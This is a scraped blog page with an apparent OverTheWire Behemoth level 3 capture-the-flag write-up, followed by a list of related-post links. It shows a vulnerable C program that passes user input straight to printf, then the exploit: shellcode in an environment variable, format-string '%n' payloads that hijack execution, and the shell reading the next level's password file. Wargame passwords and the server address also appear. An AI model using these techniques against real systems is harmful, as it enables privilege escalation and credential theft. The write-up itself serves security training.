behemoth - 03
来源:互联网 发布:淘宝试用网 编辑:程序博客网 时间:2024/05/17 12:51
#include <stdio.h>int main(int argc, char *argv[]){char buf[200];printf("Identify yourself: ");fgets(buf, 200, stdin);printf("Welcome, ");printf(buf);puts("\naaaand goodbye again.");return 0;}
root@today:~# ssh behemoth3@178.79.134.250behemoth3@178.79.134.250's password: nieteidielbehemoth3@melinda:~$ cd /behemothbehemoth3@melinda:/behemoth$ export EGG=$(python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80"')behemoth3@melinda:/behemoth$ /tmp/shui3/env EGG ./behemoth30xffffd8abbehemoth3@melinda:/behemoth$ gdb -tui behemoth3(gdb) b main(gdb) layout asm(gdb) run(gdb) i r espesp 0xffffd5b8 0xffffd5b8(gdb) behemoth3@melinda:/behemoth$ (python -c 'print "\xbc\xd5\xff\xff" + "%10d%6$n"') | ./behemoth3Identify yourself: Welcome, 锟斤拷锟斤拷 200aaaand goodbye again.behemoth3@melinda:/behemoth$ (python -c 'print "\xcc\xd5\xff\xff" + "%10d%6$n"') | ./behemoth3Identify yourself: Welcome, 锟斤拷锟斤拷 200aaaand goodbye again.behemoth3@melinda:/behemoth$ (python -c 'print "\xdc\xd5\xff\xff" + "%10d%6$n"') | ./behemoth3Identify yourself: Welcome, 锟斤拷锟斤拷 200aaaand goodbye again.Segmentation faultbehemoth3@melinda:/behemoth$ (python -c 'print "\xdc\xd5\xff\xff\xde\xd5\xff\xff" + "%55459x%6$n%10068x%7$n"' ; cat) | ./behemoth3Identify yourself: Welcome, 锟斤拷锟斤拷锟斤拷锟斤拷 c8 f7fcbc20aaaand goodbye again.whoamibehemoth4cat /etc/behemoth_pass/behemoth4ietheishei^C
┌─────────────────────────────────────────────────────────────────────────────────┐ │0x804847d <main> push %ebp │ │0x804847e <main+1> mov %esp,%ebp │ │0x8048480 <main+3> and $0xfffffff0,%esp │ │0x8048483 <main+6> sub $0xe0,%esp │ │0x8048489 <main+12> movl $0x8048570,(%esp) │ │0x8048490 <main+19> call 0x8048330 <printf@plt> │ │0x8048495 <main+24> mov 0x80497a4,%eax │ │0x804849a <main+29> mov %eax,0x8(%esp) │ │0x804849e <main+33> movl $0xc8,0x4(%esp) │ │0x80484a6 <main+41> lea 0x18(%esp),%eax │ │0x80484aa <main+45> mov %eax,(%esp) │ │0x80484ad <main+48> call 0x8048340 <fgets@plt> │ │0x80484b2 <main+53> movl $0x8048584,(%esp) │ │0x80484b9 <main+60> call 0x8048330 <printf@plt> │ │0x80484be <main+65> lea 0x18(%esp),%eax │ │0x80484c2 <main+69> mov %eax,(%esp) │ │0x80484c5 <main+72> call 0x8048330 <printf@plt> │ │0x80484ca <main+77> movl $0x804858e,(%esp) │ │0x80484d1 <main+84> call 0x8048350 <puts@plt> │ │0x80484d6 <main+89> mov $0x0,%eax │ │0x80484db <main+94> leave │ │0x80484dc <main+95> ret │ └─────────────────────────────────────────────────────────────────────────────────┘
0 0
- behemoth - 03
- behemoth - 00
- behemoth - 01
- behemoth - 02
- behemoth - 04
- behemoth - 05
- behemoth - 06
- behemoth - 07
- 170903 WarGames-Behemoth(0)
- 170903 WarGames-Behemoth(1)
- 170904 WarGames-Behemoth(2)
- 170905 WarGames-Behemoth(3)
- 170906 WarGames-Behemoth(4)
- 170908 WarGames-Behemoth(7)
- 170907 WarGames-Behemoth(5-6)
- 03
- 03
- 03
- Git更新远程仓库代码到本地 git fetch
- windows 绕过密码进入系统
- C++基础::shared_ptr 编程细节(二)
- 使用MFC操作EXCEL文件
- Git中pull对比fetch和merge
- behemoth - 03
- Android开发中的多线程
- 偶2016年要做的几件大事
- OpenCv矩阵操作
- 过年回来发现证书失效了是因为系统证书的问题,更新一下系统证书WWDR!
- Java注解
- 用户名不能为空 Bad credentials.
- highcharts在导出时如何自定义图表的表头
- volley框架下,使用post方式请求服务器,传递参数和头